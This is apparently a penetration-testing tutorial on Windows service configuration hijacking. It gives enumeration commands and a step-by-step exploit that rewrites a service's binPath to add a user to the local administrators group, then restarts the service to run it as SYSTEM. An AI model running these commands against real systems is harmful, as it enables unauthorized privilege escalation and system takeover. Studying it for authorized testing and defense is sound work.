Service configuration hijacking abuses the ability to change a service command line. The common target is binPath, which tells the Service Control Manager what to execute when the service starts.
The primitive is direct service reconfiguration. If the service runs as LocalSystem, a low-privileged user with service change rights can execute a command as SYSTEM on the next service start.
When enumerating service configuration hijack opportunities, try to identify:
- Current user has
SERVICE_CHANGE_CONFIG - Service runs as
LocalSystemor another privileged account - Current user can restart the service
- Original
BINARY_PATH_NAME - Whether the service can tolerate a failed start
Enumeration
Inspect the service:
sc qc <ServiceName>
Check weak service permissions:
accesschk64.exe /accepteula -quvcw <ServiceName>
Check whether the service can be stopped and started:
sc query <ServiceName>
sc sdshow <ServiceName>
Interesting findings include:
BINARY_PATH_NAMEpoints to a privileged service binarySERVICE_START_NAMEisLocalSystem- Current user can change service config
- Current user can restart the service
Once configuration control is confirmed, the service command line can be replaced with a one-shot command or payload path.
Exploit
- Record the original service configuration.
sc qc <ServiceName>
- Modify the service binary path to run a command.
sc config <ServiceName> binPath= "C:\Windows\System32\cmd.exe /c net localgroup administrators <user> /add"
- Restart the service.
sc stop <ServiceName>
sc start <ServiceName>
The service may return an error because cmd.exe is not a real service binary. The command can still execute before the Service Control Manager reports failure.
- Confirm the result.
net localgroup administrators
- Start a fresh logon session if group membership was changed.
klist purge
Sign out and back in, or create a new session so the new group membership appears in the token.